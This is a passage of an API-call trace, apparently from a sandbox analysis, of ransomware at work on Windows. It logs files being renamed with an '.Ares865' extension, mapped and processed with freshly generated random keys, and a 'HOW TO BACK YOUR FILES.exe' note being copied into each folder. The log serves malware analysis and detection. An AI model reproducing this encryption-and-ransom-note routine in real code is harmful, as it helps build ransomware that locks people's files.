param_1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.Ares865") returned 83 [0078.473] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.ares865"), dwFlags=0x1) returned 1 [0078.473] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.473] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1565) returned 1 [0078.473] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.474] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0078.474] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0078.474] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0078.474] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.474] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0078.475] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x920, lpName=0x0) returned 0xa4 [0078.476] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x920) returned 0x190000 [0078.477] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0078.477] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.477] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0078.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.478] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.478] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.478] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0078.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0078.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.478] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0078.478] CloseHandle (hObject=0xa4) returned 1 [0078.478] CloseHandle (hObject=0x15c) returned 1 [0078.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0078.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.478] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6046f780, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x6046f780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0078.478] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0078.478] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0078.479] lstrcmpiW (lpString1="Setup.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.479] lstrcmpiW (lpString1="Setup.xml", lpString2="aoldtz.exe") returned 1 [0078.479] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.479] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.479] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.479] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2296) returned 1 [0078.479] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.480] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0078.480] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0078.480] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0078.481] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.481] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0078.481] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc00, lpName=0x0) returned 0xa4 [0078.482] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc00) returned 0x190000 [0078.483] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0078.483] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.483] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0078.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0078.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0078.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.484] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0078.484] CloseHandle (hObject=0xa4) returned 1 [0078.484] CloseHandle (hObject=0x15c) returned 1 [0078.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0078.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.484] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0078.485] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0078.485] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e7a10 [0078.485] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings", iMaxLength=260 | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0078.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc4f8 | out: hHeap=0x2b0000) returned 1 [0078.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0078.485] lstrlenW (lpString="C:\\Documents and Settings") returned 25 [0078.485] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0078.485] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.485] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.485] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.486] GetLastError () returned 0x0 [0078.486] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.486] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.486] CloseHandle (hObject=0x118) returned 1 [0078.486] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.486] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.486] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49354420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49354420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.486] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.486] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.486] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49354420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49354420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.486] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.486] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0078.487] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public") returned="C:\\Documents and Settings\\Public" [0078.487] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eea10 | out: hHeap=0x2b0000) returned 1 [0078.487] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0078.487] lstrlenW (lpString="C:\\Documents and Settings\\Public") returned 32 [0078.487] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public" | out: lpString1="C:\\Documents and Settings\\Public") returned="C:\\Documents and Settings\\Public" [0078.487] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.487] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.487] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.487] GetLastError () returned 0x0 [0078.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.488] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.488] CloseHandle (hObject=0x118) returned 1 [0078.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.488] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.488] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x494d11e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x494d11e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.488] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.488] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.488] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Videos", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Videos") returned="C:\\Documents and Settings\\Public\\Videos" [0078.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8a0 | out: hHeap=0x2b0000) returned 1 [0078.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0078.488] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Videos") returned 39 [0078.488] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Videos" | out: lpString1="C:\\Documents and Settings\\Public\\Videos") returned="C:\\Documents and Settings\\Public\\Videos" [0078.488] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.488] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.489] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.489] GetLastError () returned 0x0 [0078.489] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.489] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.489] CloseHandle (hObject=0x118) returned 1 [0078.489] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.489] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.489] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Videos\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.489] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.489] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.490] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Videos\\Sample Videos", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Videos\\Sample Videos") returned="C:\\Documents and Settings\\Public\\Videos\\Sample Videos" [0078.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0078.490] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Videos\\Sample Videos") returned 53 [0078.490] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Videos\\Sample Videos" | out: lpString1="C:\\Documents and Settings\\Public\\Videos\\Sample Videos") returned="C:\\Documents and Settings\\Public\\Videos\\Sample Videos" [0078.490] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.490] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Videos\\Sample Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\videos\\sample videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.490] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.490] GetLastError () returned 0x0 [0078.490] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.490] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.491] CloseHandle (hObject=0x118) returned 1 [0078.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.491] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.491] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.491] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.491] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.491] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Recorded TV", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Recorded TV") returned="C:\\Documents and Settings\\Public\\Recorded TV" [0078.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2100 | out: hHeap=0x2b0000) returned 1 [0078.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0078.491] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Recorded TV") returned 44 [0078.491] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Recorded TV" | out: lpString1="C:\\Documents and Settings\\Public\\Recorded TV") returned="C:\\Documents and Settings\\Public\\Recorded TV" [0078.491] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.491] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Recorded TV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\recorded tv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.492] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.492] GetLastError () returned 0x0 [0078.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.492] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.492] CloseHandle (hObject=0x118) returned 1 [0078.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.492] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.492] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Recorded TV\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4a78ff20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a78ff20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.492] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.492] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.492] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Recorded TV\\Sample Media", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Recorded TV\\Sample Media") returned="C:\\Documents and Settings\\Public\\Recorded TV\\Sample Media" [0078.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0078.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0078.492] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Recorded TV\\Sample Media") returned 57 [0078.492] lstrcatW (in: lpString1="", lpString2="C:\\Documents and 